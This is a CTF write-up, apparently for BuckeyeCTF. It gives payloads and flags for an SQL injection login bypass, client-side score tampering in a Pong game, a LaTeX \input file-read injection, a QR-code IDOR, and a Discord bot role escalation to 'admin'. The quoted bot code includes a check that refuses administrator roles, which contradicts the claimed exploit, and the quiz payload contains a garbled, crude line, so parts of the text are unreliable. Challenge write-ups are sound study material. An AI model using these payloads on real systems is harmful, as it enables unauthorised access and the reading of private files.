● buckeyenotes
The "=" character is filtered, so bypass it.
Payload :
' or username like 'brutusB3stNut9999' and password like '%a%'--
Flag :
buckeye{wr1t3_ur_0wn_0p3n_2_pwn}
● pong
I couldn't find any flag in this service, so I guessed that winning the game would give me the flag.
No source code is given, so I looked in devtools and found the code below.
// Socket.IO connection to the game server and the canvas we draw on.
const socket = io();
const canvas = document.getElementById("game");

// Geometry as fractions of the canvas: paddle length, paddle width, ball size.
const pl = 0.16;
const pw = 0.02;
const bs = 0.04;

// Keyboard state for the left paddle (1 while the key is held, else 0).
var up = 0;
var down = 0;

// Paddle centres (y, 0..1) and ball position (x, y, 0..1).
var p1 = 0.5;
var p2 = 0.5;
var bx = 0.5;
var by = 0.5;

// Ball velocity per frame, rotation angle in degrees, and spin added per frame.
var bvx = 0;
var bvy = 0;
var bt = 0;
var spin = 0;

// Score cells lit for the left (s1) and right (s2) player.
var s1 = 0;
var s2 = 0;
/**
 * Put a 2D context back into the default drawing state used by every pass:
 * identity transform, a half-pixel vertical offset, and a 1px stroke.
 * @param {CanvasRenderingContext2D} ctx - context to reset (mutated in place)
 */
function reset(ctx) {
  const halfPixelOffsetY = 0.5;
  ctx.resetTransform();
  ctx.translate(0, halfPixelOffsetY);
  Object.assign(ctx, { lineWidth: 1 });
}
/**
 * Return the ball to the centre of the field, stationary and without spin.
 * Writes the module-level ball state (bx, by, bvx, bvy, bt, spin); the paddles
 * and scores are left untouched.
 */
function set() {
  [bx, by, bvx, bvy, bt, spin] = [0.5, 0.5, 0, 0, 0, 0];
}
/**
 * Repaint one frame: background, centre line, ball, both paddles, score bar.
 * Reads the module-level state (bx, by, bt, spin, p1, p2, s1, s2) and also
 * advances the ball's rotation angle bt by spin, wrapping it into 0..359.
 */
function draw() {
  // Size the backing store to the element so our fractions map onto pixels.
  canvas.width = canvas.clientWidth;
  canvas.height = canvas.clientHeight;
  const { width: w, height: h } = canvas;
  const ctx = canvas.getContext("2d");

  reset(ctx);
  ctx.fillStyle = "#FFFFFF";
  ctx.fillRect(0, 0, w, h);

  // Dashed centre line: ten 5%-tall dashes down the middle.
  ctx.fillStyle = "#aaaaaa";
  for (let y = 0; y < 1; y += 0.1) {
    ctx.fillRect(w / 2 - 5, (y + 0.025) * h, 10, 0.05 * h);
  }

  // Ball: rotate about its own centre by the accumulated angle.
  ctx.fillStyle = "#000000";
  ctx.translate(bx * w, by * h);
  bt += spin;
  while (bt < 0) bt += 360;
  while (bt > 359) bt -= 360;
  ctx.rotate((bt * Math.PI) / 180);
  const side = bs * h;
  ctx.fillRect(-side / 2, -side / 2, side, side);
  reset(ctx);

  // Paddles: left at one paddle-width in, right at two paddle-widths from the edge.
  ctx.fillStyle = "#000000";
  ctx.fillRect(pw * w, (p1 - pl / 2) * h, pw * w, pl * h);
  ctx.fillRect((1 - 2 * pw) * w, (p2 - pl / 2) * h, pw * w, pl * h);

  // Score bar: 20 cells across the top; left player fills from the left
  // edge, right player fills from the right edge inward.
  for (let x = 0; x < 20; x += 1) {
    const cellX = x * 0.05 * w;
    ctx.beginPath();
    ctx.rect(cellX, 0, 0.05 * w, 0.01 * h);
    ctx.stroke();
    const lightsLeft = x < s1;
    const lightsRight = x > 9 && s2 > 19 - x;
    if (lightsLeft) ctx.fillRect(cellX, 0, 0.05 * w, 0.01 * h);
    if (lightsRight) ctx.fillRect(cellX, 0, 0.05 * w, 0.01 * h);
  }
}
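/**
 * Advance the simulation one step and repaint.
 * Moves the left paddle from the held keys (up/down), pins the right paddle to
 * the ball's y, integrates the ball, bounces it off the top/bottom walls and
 * the paddles, and reports to the server once the ball has left the field.
 * Mutates module-level state: p1, p2, spin, bx, by, bvx, bvy.
 * (The unused canvas width/height locals of the original have been dropped.)
 */
function tick() {
  // Keyboard-driven left paddle, clamped so it stays fully on the field.
  if (p1 - up * 0.01 > pl / 2) p1 -= up * 0.01;
  if (p1 + down * 0.01 < 1 - pl / 2) p1 += down * 0.01;
  // The right paddle simply tracks the ball.
  p2 = by;

  // Spin follows the direction of travel; skip when bvx is 0 to avoid dividing by zero.
  if (bvx !== 0) spin = (bvy / bvx) * 5;
  bx += bvx;
  by += bvy;
  if (by < 0 || by > 1) bvy *= -1; // top/bottom wall bounce

  // Left paddle: outgoing angle depends on where on the paddle the ball hit.
  if (bx < pw * 2 && by > p1 - pl / 2 && by < p1 + pl / 2) {
    const diff = by - p1;
    bvy = (0.015 * diff) / (pl / 2);
    bvx = 0.015 - Math.abs(bvy);
  }
  // Right paddle: same rule, mirrored.
  if (bx > 1 - pw * 2 && by > p2 - pl / 2 && by < p2 + pl / 2) {
    const diff = by - p2;
    bvy = (0.015 * diff) / (pl / 2);
    bvx = -(0.015 - Math.abs(bvy));
  }

  // NOTE(review): the client reports its own ball position as the "score"
  // event, and this fires on every tick while the ball stays out of bounds.
  // bx is client-controlled state, so the server must validate it (or keep
  // the ball authoritative server-side) rather than trust the value; nothing
  // in this file can enforce that.
  if (bx < -0.1 || bx > 1.1) {
    socket.emit("score", bx);
  }
  draw();
}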
/**
 * Draw the first frame, start the 13ms simulation timer, and wire the keys:
 * "w"/"s" hold the left paddle up/down, "p" asks the server to begin a rally.
 */
function init() {
  draw();
  setInterval(tick, 13);

  const onKeyDown = (e) => {
    switch (e.key) {
      case "w":
        up = 1;
        break;
      case "s":
        down = 1;
        break;
      case "p":
        socket.emit("begin");
        break;
      default:
        break;
    }
  };
  const onKeyUp = (e) => {
    switch (e.key) {
      case "w":
        up = 0;
        break;
      case "s":
        down = 0;
        break;
      default:
        break;
    }
  };

  document.addEventListener("keydown", onKeyDown);
  document.addEventListener("keyup", onKeyUp);
}
// Server -> client events.
// "alert": show a server-supplied message to the player.
socket.on("alert", function (msg) {
  alert(msg);
});
// "begin": the server hands out the ball's initial velocity for a rally.
socket.on("begin", function ({ bvx: vx, bvy: vy }) {
  bvx = vx;
  bvy = vy;
});
// "set": a point was scored; recentre the ball and take the server's scores.
socket.on("set", function (scores) {
  set();
  ({ sx1: s1, sx2: s2 } = scores);
});
The variable "bx" seems to be the ball's x position. What if I manipulate "bx" to win the game? Maybe that gives me the flag.
if(bx < -.1 || bx > 1.1) {
socket.emit("score", bx);
}
The developer must have had a reason to use a conditional here to drive the service; that was my hint. What if I set a value bigger than 1.1?
Payload :
// In devtools console
bx = 10
Flag :
buckeye{1f_3v3ry0n3_ch3475_175_f41r}
● textual
Reference : https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LaTeX%20Injection
Payload :
: \input{/home/ctf/app/flag.tex}
Flag :
buckeye{w41t_3v3n_l4t3x_15_un54f3}
● Scanbook - IDOR Vulnerability
The service can both create and check QR codes. I entered "asdfasf" as a test, and the service generated a QR code.
Testing further, I found the filename of the PNG. All filenames consist only of numbers. I scanned the same QR code in an online QR reader.
The decoded result is the filename, not the file's content.
I also found that creating more files makes the filename number increase. This service might be vulnerable to IDOR.
I guessed that "1.png" is the flag file. I used online_barcode_generator.
Put this QR into problem service.
Then it said "Sorry, we lost your post.". If 1.png is not the correct answer, try "0.png".
Flag :
buckeye{4n_1d_numb3r_15_N07_4_p455w0rd}
● Quiz Bot
Join the discord link.
The bot explains how to use it; according to it, the "!quiz" command starts a quiz.
# bot.py
...
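@client.event
async def on_raw_reaction_add(event):
    """Grant a role when a user reacts to one of the bot's role-menu messages.

    Every line after the first of the bot's message is read as
    "<emoji> <role name>"; when the reaction's emoji matches a line, the
    named role is added to the reacting member.

    Args:
        event: raw reaction payload carrying emoji, user_id, channel_id
            and message_id.
    """
    emoji = event.emoji
    user = client.get_user(event.user_id)
    member = guild.get_member(event.user_id)
    channel = client.get_channel(event.channel_id)
    message = await channel.fetch_message(event.message_id)
    # Only act on the bot's own messages, and ignore the bot's own reactions.
    if message.author != client.user or user == client.user:
        return
    # Nobody to grant a role to (user not in this guild / not cached).
    if not member:
        return
    lines = message.content.split("\n")[1:]
    for line in lines:
        try:
            line_reaction, role_name = line.strip().split(" ", 1)
        except ValueError:
            continue  # line is not an "<emoji> <role>" pair
        if str(emoji) != line_reaction:
            continue
        role = discord.utils.get(guild.roles, name=role_name)
        # NOTE(review): role_name is taken from message text, which appears to
        # be echoed from a user's "!quiz" input, so any user can name any role
        # here. Refuse roles that do not exist (add_roles(None) would fail) and
        # roles carrying administrator rights; the proper fix is to resolve the
        # role from a server-side allowlist of self-assignable roles instead of
        # from the message body.
        if role is None or role.permissions.administrator:
            continue
        await member.add_roles(role)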
...
Let's understand the code.
1. Check that I reacted to a message sent by the bot.
2. Split the message on "\n" and drop its first line.
3. Compare the emoji at the start of each line with the emoji I used to react.
4. If they match, the role named on that line is added to me, so I can get the admin role.
Payload :
!quiz
❤️ admin
:bimbo:brutus:440028476969420/222:wenis:sweaty:behind the taco bell
Then, in the OSU academic team server, enter "#admin-only".
Flag :
buckeye{5tat3l355_m0r3_L1K3_DaT3L355}
Problems I couldn't solve (will be written up later)
goober / shortbread